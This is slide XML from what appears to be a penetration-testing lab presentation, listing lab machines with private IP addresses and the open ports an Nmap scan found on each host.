              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>OS: Linux 2.6.32</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 2</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>ELK</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>Capstone</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="50400"/>
            <a:ext cx="17860800" cy="15423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Network Topology</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="151" name="Google Shape;151;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2561625" y="2427925"/>
            <a:ext cx="14350801" cy="10523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32800" y="0"/>
            <a:ext cx="24443100" cy="1765200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="66675"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Scanning the network - Nmap</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;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5</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168850" y="1936825"/>
            <a:ext cx="4150575" cy="3554225"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartOffpageConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="214313" dist="85725" dir="2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t>ML-ReVM-684427</a:t>
            </a:r>
            <a:endParaRPr sz="2300" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300"/>
              <a:t>HyperLink-V</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300"/>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300"/>
              <a:t>135 MSRPC</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300"/>
              <a:t>139 Open Netbios-SSN</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300"/>
              <a:t>445 Open Microsoft-DS</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300"/>
              <a:t>2179 Open VMRDP</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300"/>
              <a:t>3389 Open MS-WBT-Server</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168850" y="5805775"/>
            <a:ext cx="4150575" cy="2137575"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartOffpageConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9FC5E8"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="214313" dist="85725" dir="2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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2300" b="1">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192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="2300">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22 Open SSH</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168850" y="10595750"/>
            <a:ext cx="4150575" cy="2137575"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartOffpageConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3D85C6"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="214313" dist="85725" dir="2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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Capstone</a:t>
            </a:r>
            <a:endParaRPr sz="2300" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>22 Open SSH</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>80 Open HTTP</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5901200" y="1936825"/>
            <a:ext cx="4150575" cy="3554225"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartOffpageConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EA9999"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="214313" dist="85725" dir="2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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>TARGET 1</a:t>
            </a:r>
            <a:endParaRPr sz="2300" b="1">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192.168.1.110</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22 Open SSH</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80 Open HTTP</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111 Open RPCBind</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139 Open Netbios-SSN</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445 Open Microsoft-DS</a:t>
            </a:r>
            <a:endParaRPr sz="2300" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5901188" y="5805775"/>
            <a:ext cx="4150575" cy="3554225"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartOffpageConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E06666"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="214313" dist="85725" dir="2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300" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>TARGET 2</a:t>
            </a:r>
